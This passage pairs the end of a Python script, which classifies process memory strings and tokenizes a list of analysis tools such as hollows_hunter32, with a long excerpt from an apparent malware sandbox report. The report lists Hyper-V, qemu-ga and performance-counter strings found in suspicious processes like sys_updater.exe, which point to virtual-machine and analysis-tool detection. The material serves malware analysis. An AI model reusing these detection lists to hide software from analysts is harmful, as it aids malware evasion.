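    for label, s in (("tool list", FUSED_TOOL_LIST), ("perflib", PERFLIB_FRAGMENT),
                     ("keyword", BARE_KEYWORD)):
        print(f"{label:10} -> {classify_memory_string(s)}")
    for cat, name in tokenize_fused_list(FUSED_TOOL_LIST):
        print(f"  {cat:16} {name}")
    print(summarize_blocklist(FUSED_TOOL_LIST))
```

Run stand-alone it prints the three classifications and the tokenized blocklist; the leading "hollows_hunter32" comes out as residue because the dump does not show a complete name there, which is the point of matching against a vocabulary instead of splitting on ".exe".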
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service`
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V qbqdsitfxsrfbfn Busv
                            Source: sys_updater.exe, 00000022.00000003.2893122685.00000237D30A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation 
Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                            Source: sys_updater.exe, 00000022.00000003.2893714166.00000237D3087000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: quence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switc
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                            Source: sys_updater.exe, 00000022.00000003.2930228516.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935332753.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2925919889.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2934420769.00000237D3262000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000022.00000003.2935892757.00000237D3262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot con@@+
                            Source: MSBuild.exe, 0000000C.00000002.1842346912.0000000002F93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,fq
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2139747550.00000234D400A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800M3
                            Source: sys_updater.exe, 00000022.00000003.2927093740.00000237D309A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: evice pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Costde i
                            Source: sys_updater.exe, 0000001F.00000003.2932929052.0000020E479B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorD
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service8{P!
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor:
                            Source: sys_updater.exe, 00000018.00000003.2636536344.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2649797077.0000021E03001000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2635893367.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2648769571.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2645299246.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2636092629.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2635568445.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2648562867.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2647420360.0000021E03058000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2637859660.0000021E03058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: me3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytesgg
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processore%
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionTFh
                            Source: sys_updater.exe, 0000001F.00000003.2806925063.0000020E47BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discoveries9610Hosted Cache: Segment offers queue size9612Publication Cache: Published contents9614Local Cache: Average access time3432WSMan Quota Statistics3434Total Requests/Second3436User Quota Violations/Second3438System Quota Violations/Second3440Active Shells3442Active Operations3444Active Users3446Process ID1914Hyper-V VM Vid Partition1916Physical Pages Allocated1918Preferred NUMA Node Index1920Remote Physical Pages1922ClientHandles1924CompressPackTimeInUs1926CompressUnpackTimeInUs1928CompressPackInputSizeInBytes1930CompressUnpackInputSizeInBytes1932CompressPackOutputSizeInBytes1934CompressUnpackOutputSizeInBytes1936CompressUnpackUncompressedInputSizeInBytes1938CompressPackDiscardedSizeInBytes1940CompressWorkspaceSizeInBytes1942CompressScratchPoolSizeInBytes1944CryptPackTimeInUs1946CryptUnpackTimeInUs1948CryptPackInputSizeInBytes1950CryptUnpackInputSizeInBytes1952CryptPackOutputSizeInBytes1954CryptUnpackOutputSizeInBytes1956CryptScratchPoolSizeInBytes?
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionmun
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140247893.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140442384.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141646322.00000234D412D000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140855705.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2140360662.00000234D412E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2152444106.00000234D410F000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2141190168.00000234D412E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
                            Source: sys_updater.exe, 00000018.00000003.2641927809.0000021E03058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accu
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor\6
                            Source: sys_updater.exe, 0000001F.00000003.2838586237.0000020E47B69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860I
                            Source: sys_updater.exe, 00000018.00000003.2688850080.0000021E016A9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2664610216.0000021E016B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes0~
                            Source: sys_updater.exe, 0000001B.00000003.2712171973.00000159F3459000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls&
                            Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2170903109.00000234D3F9E000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2180148890.00000234D3FA5000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2184700567.00000234D3FA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorn}
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor8B
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processordll
                            Source: sys_updater.exe, 0000001B.00000003.2716964943.00000159F1B0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation
                            Source: sys_updater.exe, 0000001B.00000003.2765696343.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2788314764.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root PartitionByO
